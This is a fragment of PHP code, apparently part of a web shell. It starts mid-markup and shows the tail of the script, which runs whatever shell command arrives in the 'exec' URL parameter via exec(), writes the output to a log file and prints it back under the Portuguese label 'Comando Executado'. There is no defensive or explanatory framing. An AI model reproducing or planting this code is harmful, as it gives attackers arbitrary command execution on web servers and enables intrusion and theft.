Refresh!

"; } if($_SERVER['QUERY_STRING'] == "cmm"){ echo ""; } elseif(!empty($_GET['exec'])){ showform(); $logfile = "log.bin";@unlink($logfile); $comanDo = exec("".$_GET[exec]." > $logfile"); echo "
~ Comando Executado ~

$_GET[exec]

"; echo(nl2br(htmlspecialchars(join('',file($logfile))))); } else{ showform(); } ?>